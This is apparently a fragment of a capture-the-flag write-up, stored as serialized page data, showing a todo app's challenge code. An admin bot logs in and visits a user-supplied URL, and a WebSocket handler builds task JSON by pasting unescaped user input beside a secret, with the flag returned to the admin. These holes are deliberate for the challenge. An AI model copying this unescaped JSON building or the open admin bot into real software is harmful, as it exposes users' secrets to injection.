":48052,"children":48053},{"emptyLinePlaceholder":896},[48054],{"type":38,"value":899},{"type":33,"tag":128,"props":48056,"children":48057},{"class":130,"line":1214},[48058,48062,48066,48070,48074,48078,48082,48086,48090,48094,48098],{"type":33,"tag":128,"props":48059,"children":48060},{"style":300},[48061],{"type":38,"value":15973},{"type":33,"tag":128,"props":48063,"children":48064},{"style":135},[48065],{"type":38,"value":47320},{"type":33,"tag":128,"props":48067,"children":48068},{"style":312},[48069],{"type":38,"value":5657},{"type":33,"tag":128,"props":48071,"children":48072},{"style":300},[48073],{"type":38,"value":5598},{"type":33,"tag":128,"props":48075,"children":48076},{"style":312},[48077],{"type":38,"value":2852},{"type":33,"tag":128,"props":48079,"children":48080},{"style":306},[48081],{"type":38,"value":5607},{"type":33,"tag":128,"props":48083,"children":48084},{"style":312},[48085],{"type":38,"value":5584},{"type":33,"tag":128,"props":48087,"children":48088},{"style":306},[48089],{"type":38,"value":5616},{"type":33,"tag":128,"props":48091,"children":48092},{"style":312},[48093],{"type":38,"value":2966},{"type":33,"tag":128,"props":48095,"children":48096},{"style":312},[48097],{"type":38,"value":5625},{"type":33,"tag":128,"props":48099,"children":48100},{"style":312},[48101],{"type":38,"value":762},{"type":33,"tag":128,"props":48103,"children":48104},{"class":130,"line":1226},[48105],{"type":33,"tag":128,"props":48106,"children":48107},{"emptyLinePlaceholder":896},[48108],{"type":38,"value":899},{"type":33,"tag":128,"props":48110,"children":48111},{"class":130,"line":1239},[48112,48116,48120,48124,48129,48133],{"type":33,"tag":128,"props":48113,"children":48114},{"style":1576},[48115],{"type":38,"value":6625},{"type":33,"tag":128,"props":48117,"children":48118},{"style":312},[48119],{"type":38,"value":2852},{"type":33,"tag":128,"props":48121,"children":48122},{"style":300},[48123],{"type":38,"value":16424},{"type":33,"tag":128,"props":48125,"children":48126},{"style":306},[48127],{"type":38,"value":48128},"browser",{"type":33,"tag":128,"props":48130,"children":48131},{"style":312},[48132],{"type":38,"value":2966},{"type":33,"tag":128,"props":48134,"children":48135},{"style":312},[48136],{"type":38,"value":762},{"type":33,"tag":128,"props":48138,"children":48139},{"class":130,"line":1251},[48140,48144,48148,48152,48156,48160,48165,48169],{"type":33,"tag":128,"props":48141,"children":48142},{"style":306},[48143],{"type":38,"value":16105},{"type":33,"tag":128,"props":48145,"children":48146},{"style":312},[48147],{"type":38,"value":215},{"type":33,"tag":128,"props":48149,"children":48150},{"style":135},[48151],{"type":38,"value":13157},{"type":33,"tag":128,"props":48153,"children":48154},{"style":312},[48155],{"type":38,"value":5566},{"type":33,"tag":128,"props":48157,"children":48158},{"style":676},[48159],{"type":38,"value":6040},{"type":33,"tag":128,"props":48161,"children":48162},{"style":140},[48163],{"type":38,"value":48164},"[INFO] Starting browser",{"type":33,"tag":128,"props":48166,"children":48167},{"style":676},[48168],{"type":38,"value":6040},{"type":33,"tag":128,"props":48170,"children":48171},{"style":312},[48172],{"type":38,"value":2427},{"type":33,"tag":128,"props":48174,"children":48175},{"class":130,"line":1263},[48176,48181,48185,48189,48193,48197,48202],{"type":33,"tag":128,"props":48177,"children":48178},{"style":306},[48179],{"type":38,"value":48180}," browser",{"type":33,"tag":128,"props":48182,"children":48183},{"style":312},[48184],{"type":38,"value":5657},{"type":33,"tag":128,"props":48186,"children":48187},{"style":1576},[48188],{"type":38,"value":5796},{"type":33,"tag":128,"props":48190,"children":48191},{"style":306},[48192],{"type":38,"value":47377},{"type":33,"tag":128,"props":48194,"children":48195},{"style":312},[48196],{"type":38,"value":215},{"type":33,"tag":128,"props":48198,"children":48199},{"style":135},[48200],{"type":38,"value":48201},"launch",{"type":33,"tag":128,"props":48203,"children":48204},{"style":312},[48205],{"type":38,"value":48206},"({\n",{"type":33,"tag":128,"props":48208,"children":48209},{"class":130,"line":1276},[48210,48215,48219],{"type":33,"tag":128,"props":48211,"children":48212},{"style":437},[48213],{"type":38,"value":48214}," args",{"type":33,"tag":128,"props":48216,"children":48217},{"style":312},[48218],{"type":38,"value":284},{"type":33,"tag":128,"props":48220,"children":48221},{"style":312},[48222],{"type":38,"value":1466},{"type":33,"tag":128,"props":48224,"children":48225},{"class":130,"line":1288},[48226],{"type":33,"tag":128,"props":48227,"children":48228},{"style":312},[48229],{"type":38,"value":48230}," ...\n",{"type":33,"tag":128,"props":48232,"children":48233},{"class":130,"line":1300},[48234],{"type":33,"tag":128,"props":48235,"children":48236},{"style":312},[48237],{"type":38,"value":48238}," ]\n",{"type":33,"tag":128,"props":48240,"children":48241},{"class":130,"line":1313},[48242],{"type":33,"tag":128,"props":48243,"children":48244},{"style":312},[48245],{"type":38,"value":48246}," })\n",{"type":33,"tag":128,"props":48248,"children":48249},{"class":130,"line":1327},[48250],{"type":33,"tag":128,"props":48251,"children":48252},{"style":312},[48253],{"type":38,"value":6760},{"type":33,"tag":128,"props":48255,"children":48256},{"class":130,"line":11196},[48257],{"type":33,"tag":128,"props":48258,"children":48259},{"emptyLinePlaceholder":896},[48260],{"type":38,"value":899},{"type":33,"tag":128,"props":48262,"children":48263},{"class":130,"line":11204},[48264,48268,48272,48276,48280,48284,48288,48292],{"type":33,"tag":128,"props":48265,"children":48266},{"style":300},[48267],{"type":38,"value":5696},{"type":33,"tag":128,"props":48269,"children":48270},{"style":306},[48271],{"type":38,"value":15126},{"type":33,"tag":128,"props":48273,"children":48274},{"style":312},[48275],{"type":38,"value":5657},{"type":33,"tag":128,"props":48277,"children":48278},{"style":306},[48279],{"type":38,"value":5662},{"type":33,"tag":128,"props":48281,"children":48282},{"style":312},[48283],{"type":38,"value":215},{"type":33,"tag":128,"props":48285,"children":48286},{"style":306},[48287],{"type":38,"value":5671},{"type":33,"tag":128,"props":48289,"children":48290},{"style":312},[48291],{"type":38,"value":215},{"type":33,"tag":128,"props":48293,"children":48294},{"style":306},[48295],{"type":38,"value":48296},"url\n",{"type":33,"tag":128,"props":48298,"children":48299},{"class":130,"line":11213},[48300,48304],{"type":33,"tag":128,"props":48301,"children":48302},{"style":1576},[48303],{"type":38,"value":6625},{"type":33,"tag":128,"props":48305,"children":48306},{"style":312},[48307],{"type":38,"value":41261},{"type":33,"tag":128,"props":48309,"children":48310},{"class":130,"line":11250},[48311,48316,48320,48325],{"type":33,"tag":128,"props":48312,"children":48313},{"style":306},[48314],{"type":38,"value":48315}," url",{"type":33,"tag":128,"props":48317,"children":48318},{"style":300},[48319],{"type":38,"value":13595},{"type":33,"tag":128,"props":48321,"children":48322},{"style":300},[48323],{"type":38,"value":48324}," undefined",{"type":33,"tag":128,"props":48326,"children":48327},{"style":300},[48328],{"type":38,"value":48329}," ||\n",{"type":33,"tag":128,"props":48331,"children":48332},{"class":130,"line":11270},[48333,48337,48341,48345,48349,48354,48358,48362,48367,48371,48375,48379,48383,48387,48391,48395,48399,48403,48408,48412],{"type":33,"tag":128,"props":48334,"children":48335},{"style":312},[48336],{"type":38,"value":19659},{"type":33,"tag":128,"props":48338,"children":48339},{"style":300},[48340],{"type":38,"value":16424},{"type":33,"tag":128,"props":48342,"children":48343},{"style":306},[48344],{"type":38,"value":13952},{"type":33,"tag":128,"props":48346,"children":48347},{"style":312},[48348],{"type":38,"value":215},{"type":33,"tag":128,"props":48350,"children":48351},{"style":135},[48352],{"type":38,"value":48353},"startsWith",{"type":33,"tag":128,"props":48355,"children":48356},{"style":312},[48357],{"type":38,"value":5566},{"type":33,"tag":128,"props":48359,"children":48360},{"style":676},[48361],{"type":38,"value":6040},{"type":33,"tag":128,"props":48363,"children":48364},{"style":140},[48365],{"type":38,"value":48366},"http://",{"type":33,"tag":128,"props":48368,"children":48369},{"style":676},[48370],{"type":38,"value":6040},{"type":33,"tag":128,"props":48372,"children":48373},{"style":312},[48374],{"type":38,"value":2966},{"type":33,"tag":128,"props":48376,"children":48377},{"style":300},[48378],{"type":38,"value":10037},{"type":33,"tag":128,"props":48380,"children":48381},{"style":300},[48382],{"type":38,"value":35731},{"type":33,"tag":128,"props":48384,"children":48385},{"style":306},[48386],{"type":38,"value":13952},{"type":33,"tag":128,"props":48388,"children":48389},{"style":312},[48390],{"type":38,"value":215},{"type":33,"tag":128,"props":48392,"children":48393},{"style":135},[48394],{"type":38,"value":48353},{"type":33,"tag":128,"props":48396,"children":48397},{"style":312},[48398],{"type":38,"value":5566},{"type":33,"tag":128,"props":48400,"children":48401},{"style":676},[48402],{"type":38,"value":6040},{"type":33,"tag":128,"props":48404,"children":48405},{"style":140},[48406],{"type":38,"value":48407},"https://",{"type":33,"tag":128,"props":48409,"children":48410},{"style":676},[48411],{"type":38,"value":6040},{"type":33,"tag":128,"props":48413,"children":48414},{"style":312},[48415],{"type":38,"value":2459},{"type":33,"tag":128,"props":48417,"children":48418},{"class":130,"line":11278},[48419,48424],{"type":33,"tag":128,"props":48420,"children":48421},{"style":312},[48422],{"type":38,"value":48423}," )",{"type":33,"tag":128,"props":48425,"children":48426},{"style":312},[48427],{"type":38,"value":762},{"type":33,"tag":128,"props":48429,"children":48430},{"class":130,"line":11334},[48431,48435,48439,48443,48447,48451,48455,48459,48463,48467,48471,48475,48479,48484,48488],{"type":33,"tag":128,"props":48432,"children":48433},{"style":1576},[48434],{"type":38,"value":13615},{"type":33,"tag":128,"props":48436,"children":48437},{"style":306},[48438],{"type":38,"value":5616},{"type":33,"tag":128,"props":48440,"children":48441},{"style":312},[48442],{"type":38,"value":215},{"type":33,"tag":128,"props":48444,"children":48445},{"style":135},[48446],{"type":38,"value":6686},{"type":33,"tag":128,"props":48448,"children":48449},{"style":312},[48450],{"type":38,"value":5566},{"type":33,"tag":128,"props":48452,"children":48453},{"style":523},[48454],{"type":38,"value":6695},{"type":33,"tag":128,"props":48456,"children":48457},{"style":312},[48458],{"type":38,"value":6700},{"type":33,"tag":128,"props":48460,"children":48461},{"style":135},[48462],{"type":38,"value":23433},{"type":33,"tag":128,"props":48464,"children":48465},{"style":312},[48466],{"type":38,"value":5836},{"type":33,"tag":128,"props":48468,"children":48469},{"style":437},[48470],{"type":38,"value":14251},{"type":33,"tag":128,"props":48472,"children":48473},{"style":312},[48474],{"type":38,"value":284},{"type":33,"tag":128,"props":48476,"children":48477},{"style":676},[48478],{"type":38,"value":6739},{"type":33,"tag":128,"props":48480,"children":48481},{"style":140},[48482],{"type":38,"value":48483},"Invalid URL",{"type":33,"tag":128,"props":48485,"children":48486},{"style":676},[48487],{"type":38,"value":6040},{"type":33,"tag":128,"props":48489,"children":48490},{"style":312},[48491],{"type":38,"value":13305},{"type":33,"tag":128,"props":48493,"children":48494},{"class":130,"line":11375},[48495],{"type":33,"tag":128,"props":48496,"children":48497},{"style":312},[48498],{"type":38,"value":6760},{"type":33,"tag":128,"props":48500,"children":48501},{"class":130,"line":11383},[48502],{"type":33,"tag":128,"props":48503,"children":48504},{"emptyLinePlaceholder":896},[48505],{"type":38,"value":899},{"type":33,"tag":128,"props":48507,"children":48508},{"class":130,"line":11392},[48509,48513],{"type":33,"tag":128,"props":48510,"children":48511},{"style":1576},[48512],{"type":38,"value":16034},{"type":33,"tag":128,"props":48514,"children":48515},{"style":312},[48516],{"type":38,"value":762},{"type":33,"tag":128,"props":48518,"children":48519},{"class":130,"line":11417},[48520,48524,48528,48532,48536],{"type":33,"tag":128,"props":48521,"children":48522},{"style":1576},[48523],{"type":38,"value":17718},{"type":33,"tag":128,"props":48525,"children":48526},{"style":135},[48527],{"type":38,"value":23404},{"type":33,"tag":128,"props":48529,"children":48530},{"style":312},[48531],{"type":38,"value":5566},{"type":33,"tag":128,"props":48533,"children":48534},{"style":306},[48535],{"type":38,"value":13952},{"type":33,"tag":128,"props":48537,"children":48538},{"style":312},[48539],{"type":38,"value":2427},{"type":33,"tag":128,"props":48541,"children":48542},{"class":130,"line":11441},[48543,48547,48551,48555,48560,48564,48568],{"type":33,"tag":128,"props":48544,"children":48545},{"style":1576},[48546],{"type":38,"value":13615},{"type":33,"tag":128,"props":48548,"children":48549},{"style":306},[48550],{"type":38,"value":5616},{"type":33,"tag":128,"props":48552,"children":48553},{"style":312},[48554],{"type":38,"value":215},{"type":33,"tag":128,"props":48556,"children":48557},{"style":135},[48558],{"type":38,"value":48559},"sendStatus",{"type":33,"tag":128,"props":48561,"children":48562},{"style":312},[48563],{"type":38,"value":5566},{"type":33,"tag":128,"props":48565,"children":48566},{"style":523},[48567],{"type":38,"value":46595},{"type":33,"tag":128,"props":48569,"children":48570},{"style":312},[48571],{"type":38,"value":2427},{"type":33,"tag":128,"props":48573,"children":48575},{"class":130,"line":48574},50,[48576,48580,48584,48588,48592,48596],{"type":33,"tag":128,"props":48577,"children":48578},{"style":312},[48579],{"type":38,"value":14264},{"type":33,"tag":128,"props":48581,"children":48582},{"style":1576},[48583],{"type":38,"value":6855},{"type":33,"tag":128,"props":48585,"children":48586},{"style":312},[48587],{"type":38,"value":2852},{"type":33,"tag":128,"props":48589,"children":48590},{"style":306},[48591],{"type":38,"value":23474},{"type":33,"tag":128,"props":48593,"children":48594},{"style":312},[48595],{"type":38,"value":2966},{"type":33,"tag":128,"props":48597,"children":48598},{"style":312},[48599],{"type":38,"value":762},{"type":33,"tag":128,"props":48601,"children":48603},{"class":130,"line":48602},51,[48604,48608,48612,48616,48620,48624,48628,48632,48636,48640,48644,48648,48653,48657,48661],{"type":33,"tag":128,"props":48605,"children":48606},{"style":1576},[48607],{"type":38,"value":13615},{"type":33,"tag":128,"props":48609,"children":48610},{"style":306},[48611],{"type":38,"value":5616},{"type":33,"tag":128,"props":48613,"children":48614},{"style":312},[48615],{"type":38,"value":215},{"type":33,"tag":128,"props":48617,"children":48618},{"style":135},[48619],{"type":38,"value":6686},{"type":33,"tag":128,"props":48621,"children":48622},{"style":312},[48623],{"type":38,"value":5566},{"type":33,"tag":128,"props":48625,"children":48626},{"style":523},[48627],{"type":38,"value":6695},{"type":33,"tag":128,"props":48629,"children":48630},{"style":312},[48631],{"type":38,"value":6700},{"type":33,"tag":128,"props":48633,"children":48634},{"style":135},[48635],{"type":38,"value":23433},{"type":33,"tag":128,"props":48637,"children":48638},{"style":312},[48639],{"type":38,"value":5836},{"type":33,"tag":128,"props":48641,"children":48642},{"style":437},[48643],{"type":38,"value":14251},{"type":33,"tag":128,"props":48645,"children":48646},{"style":312},[48647],{"type":38,"value":284},{"type":33,"tag":128,"props":48649,"children":48650},{"style":306},[48651],{"type":38,"value":48652}," e",{"type":33,"tag":128,"props":48654,"children":48655},{"style":312},[48656],{"type":38,"value":215},{"type":33,"tag":128,"props":48658,"children":48659},{"style":306},[48660],{"type":38,"value":6948},{"type":33,"tag":128,"props":48662,"children":48663},{"style":312},[48664],{"type":38,"value":13305},{"type":33,"tag":128,"props":48666,"children":48668},{"class":130,"line":48667},52,[48669],{"type":33,"tag":128,"props":48670,"children":48671},{"style":312},[48672],{"type":38,"value":6760},{"type":33,"tag":128,"props":48674,"children":48676},{"class":130,"line":48675},53,[48677],{"type":33,"tag":128,"props":48678,"children":48679},{"style":312},[48680],{"type":38,"value":854},{"type":33,"tag":128,"props":48682,"children":48684},{"class":130,"line":48683},54,[48685],{"type":33,"tag":128,"props":48686,"children":48687},{"emptyLinePlaceholder":896},[48688],{"type":38,"value":899},{"type":33,"tag":128,"props":48690,"children":48692},{"class":130,"line":48691},55,[48693,48698,48702,48707,48711,48715,48719],{"type":33,"tag":128,"props":48694,"children":48695},{"style":437},[48696],{"type":38,"value":48697},"module",{"type":33,"tag":128,"props":48699,"children":48700},{"style":312},[48701],{"type":38,"value":215},{"type":33,"tag":128,"props":48703,"children":48704},{"style":437},[48705],{"type":38,"value":48706},"exports",{"type":33,"tag":128,"props":48708,"children":48709},{"style":312},[48710],{"type":38,"value":5657},{"type":33,"tag":128,"props":48712,"children":48713},{"style":312},[48714],{"type":38,"value":5642},{"type":33,"tag":128,"props":48716,"children":48717},{"style":306},[48718],{"type":38,"value":47320},{"type":33,"tag":128,"props":48720,"children":48721},{"style":312},[48722],{"type":38,"value":37888},{"type":33,"tag":47,"props":48724,"children":48725},{},[48726,48727,48732],{"type":38,"value":2766},{"type":33,"tag":105,"props":48728,"children":48730},{"className":48729},[],[48731],{"type":38,"value":47353},{"type":38,"value":48733}," will visit first the login page of the todoApp and use credentials to log as admin. Then it will visit the url that is passed in the request body.",{"type":33,"tag":40,"props":48735,"children":48737},{"id":48736},"wshandler",[48738],{"type":38,"value":48739},"WsHandler",{"type":33,"tag":47,"props":48741,"children":48742},{},[48743,48745,48751],{"type":38,"value":48744},"And the most important part is the ",{"type":33,"tag":105,"props":48746,"children":48748},{"className":48747},[],[48749],{"type":38,"value":48750},"wsHandler.js",{"type":38,"value":48752}," file. It used to create a task.",{"type":33,"tag":114,"props":48754,"children":48755},{"lang":5526},[48756],{"type":33,"tag":119,"props":48757,"children":48759},{"code":48758,"language":5526,"meta":8,"className":5530,"style":8},"const { encrypt, decrypt } = require('./util/crypto');\n\nlet db;\nlet sessionParser;\n\nconst quotes = [\n \"Genius is one percent inspiration and ninety-nine percent perspiration.\",\n \"Fate is in your hands and no one elses.\",\n \"Trust yourself. You know more than you think you do.\"\n];\n\nconst wsHandler = (ws, req) => {\n let userId;\n sessionParser(req, {}, () => {\n if (req.session.userId) {\n userId = req.session.userId;\n } else {\n ws.close();\n }\n });\n\n ws.on('message', async (msg) => {\n const data = JSON.parse(msg);\n const secret = await db.getSecret(req.session.userId);\n\n if (data.action === 'add') {\n try {\n await db.addTask(userId, `{\"title\":\"${data.title}\",\"description\":\"${data.description}\",\"secret\":\"${secret}\"}`);\n ws.send(JSON.stringify({ success: true, action: 'add' }));\n } catch (e) {\n ws.send(JSON.stringify({ success: false, action: 'add' }));\n }\n }\n else if (data.action === 'get') {\n try {\n const results = await db.getTasks(userId);\n const tasks = [];\n for (const result of results) {\n\n let quote;\n\n if (userId === 1) {\n quote = `A wise man once said, \"the flag is ${process.env.FLAG}\".`;\n } else {\n quote = quotes[Math.floor(Math.random() * quotes.length)];\n }\n\n try {\n const task = JSON.parse(result.data);\n tasks.push({\n title: encrypt(task.title, task.secret),\n description: encrypt(task.description, task.secret),\n quote: encrypt(quote, task.secret)\n });\n } catch (e) {\n console.log(`Error parsing task ${result.data}: ${e}`);\n }\n }\n ws.send(JSON.stringify({ success: true, action: 'get', tasks: tasks }));\n } catch (e) {\n ws.send(JSON.stringify({ success: false, action: 'get' }));\n }\n }\n else {\n ws.send(JSON.stringify({ success: false, error: 'Invalid action' }));\n }\n });\n};\n\nmodule.exports = (database, session) => {\n db = database;\n sessionParser = session;\n return wsHandler;\n};\n",[48760],{"type":33,"tag":105,"props":48761,"children":48762},{"__ignoreMap":8},[48763,48820,48827,48842,48858,48865,48885,48905,48925,48941,48949,48956,49001,49017,49054,49093,49129,49145,49165,49172,49179,49186,49248,49287,49346,49353,49401,49413,49529,49606,49634,49709,49716,49723,49775,49786,49831,49852,49888,49895,49912,49919,49951,50015,50031,50106,50114,50121,50133,50182,50203,50257,50309,50354,50362,50389,50464,50472,50480,50572,50600,50676,50684,50692,50704,50781,50789,50797,50805,50813,50862,50884,50904,50920],{"type":33,"tag":128,"props":48764,"children":48765},{"class":130,"line":131},[48766,48770,48774,48779,48783,48787,48791,48795,48799,48803,48807,48812,48816],{"type":33,"tag":128,"props":48767,"children":48768},{"style":300},[48769],{"type":38,"value":15973},{"type":33,"tag":128,"props":48771,"children":48772},{"style":312},[48773],{"type":38,"value":5642},{"type":33,"tag":128,"props":48775,"children":48776},{"style":306},[48777],{"type":38,"value":48778}," encrypt",{"type":33,"tag":128,"props":48780,"children":48781},{"style":312},[48782],{"type":38,"value":5584},{"type":33,"tag":128,"props":48784,"children":48785},{"style":306},[48786],{"type":38,"value":47051},{"type":33,"tag":128,"props":48788,"children":48789},{"style":312},[48790],{"type":38,"value":5652},{"type":33,"tag":128,"props":48792,"children":48793},{"style":312},[48794],{"type":38,"value":5657},{"type":33,"tag":128,"props":48796,"children":48797},{"style":135},[48798],{"type":38,"value":47386},{"type":33,"tag":128,"props":48800,"children":48801},{"style":312},[48802],{"type":38,"value":5566},{"type":33,"tag":128,"props":48804,"children":48805},{"style":676},[48806],{"type":38,"value":6040},{"type":33,"tag":128,"props":48808,"children":48809},{"style":140},[48810],{"type":38,"value":48811},"./util/crypto",{"type":33,"tag":128,"props":48813,"children":48814},{"style":676},[48815],{"type":38,"value":6040},{"type":33,"tag":128,"props":48817,"children":48818},{"style":312},[48819],{"type":38,"value":5815},{"type":33,"tag":128,"props":48821,"children":48822},{"class":130,"line":362},[48823],{"type":33,"tag":128,"props":48824,"children":48825},{"emptyLinePlaceholder":896},[48826],{"type":38,"value":899},{"type":33,"tag":128,"props":48828,"children":48829},{"class":130,"line":403},[48830,48834,48838],{"type":33,"tag":128,"props":48831,"children":48832},{"style":300},[48833],{"type":38,"value":7548},{"type":33,"tag":128,"props":48835,"children":48836},{"style":306},[48837],{"type":38,"value":46507},{"type":33,"tag":128,"props":48839,"children":48840},{"style":312},[48841],{"type":38,"value":5676},{"type":33,"tag":128,"props":48843,"children":48844},{"class":130,"line":739},[48845,48849,48854],{"type":33,"tag":128,"props":48846,"children":48847},{"style":300},[48848],{"type":38,"value":7548},{"type":33,"tag":128,"props":48850,"children":48851},{"style":306},[48852],{"type":38,"value":48853}," sessionParser",{"type":33,"tag":128,"props":48855,"children":48856},{"style":312},[48857],{"type":38,"value":5676},{"type":33,"tag":128,"props":48859,"children":48860},{"class":130,"line":765},[48861],{"type":33,"tag":128,"props":48862,"children":48863},{"emptyLinePlaceholder":896},[48864],{"type":38,"value":899},{"type":33,"tag":128,"props":48866,"children":48867},{"class":130,"line":804},[48868,48872,48877,48881],{"type":33,"tag":128,"props":48869,"children":48870},{"style":300},[48871],{"type":38,"value":15973},{"type":33,"tag":128,"props":48873,"children":48874},{"style":306},[48875],{"type":38,"value":48876}," quotes",{"type":33,"tag":128,"props":48878,"children":48879},{"style":312},[48880],{"type":38,"value":5657},{"type":33,"tag":128,"props":48882,"children":48883},{"style":312},[48884],{"type":38,"value":1466},{"type":33,"tag":128,"props":48886,"children":48887},{"class":130,"line":839},[48888,48892,48897,48901],{"type":33,"tag":128,"props":48889,"children":48890},{"style":676},[48891],{"type":38,"value":771},{"type":33,"tag":128,"props":48893,"children":48894},{"style":140},[48895],{"type":38,"value":48896},"Genius is one percent inspiration and ninety-nine percent perspiration.",{"type":33,"tag":128,"props":48898,"children":48899},{"style":676},[48900],{"type":38,"value":669},{"type":33,"tag":128,"props":48902,"children":48903},{"style":312},[48904],{"type":38,"value":693},{"type":33,"tag":128,"props":48906,"children":48907},{"class":130,"line":848},[48908,48912,48917,48921],{"type":33,"tag":128,"props":48909,"children":48910},{"style":676},[48911],{"type":38,"value":771},{"type":33,"tag":128,"props":48913,"children":48914},{"style":140},[48915],{"type":38,"value":48916},"Fate is in your hands and no one elses.",{"type":33,"tag":128,"props":48918,"children":48919},{"style":676},[48920],{"type":38,"value":669},{"type":33,"tag":128,"props":48922,"children":48923},{"style":312},[48924],{"type":38,"value":693},{"type":33,"tag":128,"props":48926,"children":48927},{"class":130,"line":976},[48928,48932,48937],{"type":33,"tag":128,"props":48929,"children":48930},{"style":676},[48931],{"type":38,"value":771},{"type":33,"tag":128,"props":48933,"children":48934},{"style":140},[48935],{"type":38,"value":48936},"Trust yourself. You know more than you think you do.",{"type":33,"tag":128,"props":48938,"children":48939},{"style":676},[48940],{"type":38,"value":836},{"type":33,"tag":128,"props":48942,"children":48943},{"class":130,"line":988},[48944],{"type":33,"tag":128,"props":48945,"children":48946},{"style":312},[48947],{"type":38,"value":48948},"];\n",{"type":33,"tag":128,"props":48950,"children":48951},{"class":130,"line":1001},[48952],{"type":33,"tag":128,"props":48953,"children":48954},{"emptyLinePlaceholder":896},[48955],{"type":38,"value":899},{"type":33,"tag":128,"props":48957,"children":48958},{"class":130,"line":1014},[48959,48963,48968,48972,48976,48981,48985,48989,48993,48997],{"type":33,"tag":128,"props":48960,"children":48961},{"style":300},[48962],{"type":38,"value":15973},{"type":33,"tag":128,"props":48964,"children":48965},{"style":135},[48966],{"type":38,"value":48967}," wsHandler",{"type":33,"tag":128,"props":48969,"children":48970},{"style":312},[48971],{"type":38,"value":5657},{"type":33,"tag":128,"props":48973,"children":48974},{"style":312},[48975],{"type":38,"value":2852},{"type":33,"tag":128,"props":48977,"children":48978},{"style":306},[48979],{"type":38,"value":48980},"ws",{"type":33,"tag":128,"props":48982,"children":48983},{"style":312},[48984],{"type":38,"value":5584},{"type":33,"tag":128,"props":48986,"children":48987},{"style":306},[48988],{"type":38,"value":5662},{"type":33,"tag":128,"props":48990,"children":48991},{"style":312},[48992],{"type":38,"value":2966},{"type":33,"tag":128,"props":48994,"children":48995},{"style":312},[48996],{"type":38,"value":5625},{"type":33,"tag":128,"props":48998,"children":48999},{"style":312},[49000],{"type":38,"value":762},{"type":33,"tag":128,"props":49002,"children":49003},{"class":130,"line":1026},[49004,49009,49013],{"type":33,"tag":128,"props":49005,"children":49006},{"style":300},[49007],{"type":38,"value":49008}," let",{"type":33,"tag":128,"props":49010,"children":49011},{"style":306},[49012],{"type":38,"value":6540},{"type":33,"tag":128,"props":49014,"children":49015},{"style":312},[49016],{"type":38,"value":5676},{"type":33,"tag":128,"props":49018,"children":49019},{"class":130,"line":1038},[49020,49025,49029,49033,49037,49042,49046,49050],{"type":33,"tag":128,"props":49021,"children":49022},{"style":135},[49023],{"type":38,"value":49024}," sessionParser",{"type":33,"tag":128,"props":49026,"children":49027},{"style":312},[49028],{"type":38,"value":5566},{"type":33,"tag":128,"props":49030,"children":49031},{"style":306},[49032],{"type":38,"value":5607},{"type":33,"tag":128,"props":49034,"children":49035},{"style":312},[49036],{"type":38,"value":5584},{"type":33,"tag":128,"props":49038,"children":49039},{"style":312},[49040],{"type":38,"value":49041}," {},",{"type":33,"tag":128,"props":49043,"children":49044},{"style":312},[49045],{"type":38,"value":13259},{"type":33,"tag":128,"props":49047,"children":49048},{"style":312},[49049],{"type":38,"value":5625},{"type":33,"tag":128,"props":49051,"children":49052},{"style":312},[49053],{"type":38,"value":762},{"type":33,"tag":128,"props":49055,"children":49056},{"class":130,"line":1051},[49057,49061,49065,49069,49073,49077,49081,49085,49089],{"type":33,"tag":128,"props":49058,"children":49059},{"style":1576},[49060],{"type":38,"value":15223},{"type":33,"tag":128,"props":49062,"children":49063},{"style":312},[49064],{"type":38,"value":2852},{"type":33,"tag":128,"props":49066,"children":49067},{"style":306},[49068],{"type":38,"value":5607},{"type":33,"tag":128,"props":49070,"children":49071},{"style":312},[49072],{"type":38,"value":215},{"type":33,"tag":128,"props":49074,"children":49075},{"style":306},[49076],{"type":38,"value":6557},{"type":33,"tag":128,"props":49078,"children":49079},{"style":312},[49080],{"type":38,"value":215},{"type":33,"tag":128,"props":49082,"children":49083},{"style":306},[49084],{"type":38,"value":6566},{"type":33,"tag":128,"props":49086,"children":49087},{"style":312},[49088],{"type":38,"value":2966},{"type":33,"tag":128,"props":49090,"children":49091},{"style":312},[49092],{"type":38,"value":762},{"type":33,"tag":128,"props":49094,"children":49095},{"class":130,"line":1063},[49096,49101,49105,49109,49113,49117,49121,49125],{"type":33,"tag":128,"props":49097,"children":49098},{"style":306},[49099],{"type":38,"value":49100}," userId",{"type":33,"tag":128,"props":49102,"children":49103},{"style":312},[49104],{"type":38,"value":5657},{"type":33,"tag":128,"props":49106,"children":49107},{"style":306},[49108],{"type":38,"value":5662},{"type":33,"tag":128,"props":49110,"children":49111},{"style":312},[49112],{"type":38,"value":215},{"type":33,"tag":128,"props":49114,"children":49115},{"style":306},[49116],{"type":38,"value":6557},{"type":33,"tag":128,"props":49118,"children":49119},{"style":312},[49120],{"type":38,"value":215},{"type":33,"tag":128,"props":49122,"children":49123},{"style":306},[49124],{"type":38,"value":6566},{"type":33,"tag":128,"props":49126,"children":49127},{"style":312},[49128],{"type":38,"value":5676},{"type":33,"tag":128,"props":49130,"children":49131},{"class":130,"line":1076},[49132,49137,49141],{"type":33,"tag":128,"props":49133,"children":49134},{"style":312},[49135],{"type":38,"value":49136}," }",{"type":33,"tag":128,"props":49138,"children":49139},{"style":1576},[49140],{"type":38,"value":14269},{"type":33,"tag":128,"props":49142,"children":49143},{"style":312},[49144],{"type":38,"value":762},{"type":33,"tag":128,"props":49146,"children":49147},{"class":130,"line":1089},[49148,49153,49157,49161],{"type":33,"tag":128,"props":49149,"children":49150},{"style":306},[49151],{"type":38,"value":49152}," ws",{"type":33,"tag":128,"props":49154,"children":49155},{"style":312},[49156],{"type":38,"value":215},{"type":33,"tag":128,"props":49158,"children":49159},{"style":135},[49160],{"type":38,"value":23692},{"type":33,"tag":128,"props":49162,"children":49163},{"style":312},[49164],{"type":38,"value":15496},{"type":33,"tag":128,"props":49166,"children":49167},{"class":130,"line":1101},[49168],{"type":33,"tag":128,"props":49169,"children":49170},{"style":312},[49171],{"type":38,"value":15318},{"type":33,"tag":128,"props":49173,"children":49174},{"class":130,"line":1114},[49175],{"type":33,"tag":128,"props":49176,"children":49177},{"style":312},[49178],{"type":38,"value":13745},{"type":33,"tag":128,"props":49180,"children":49181},{"class":130,"line":1127},[49182],{"type":33,"tag":128,"props":49183,"children":49184},{"emptyLinePlaceholder":896},[49185],{"type":38,"value":899},{"type":33,"tag":128,"props":49187,"children":49188},{"class":130,"line":1139},[49189,49194,49198,49203,49207,49211,49215,49219,49223,49227,49231,49236,49240,49244],{"type":33,"tag":128,"props":49190,"children":49191},{"style":306},[49192],{"type":38,"value":49193}," 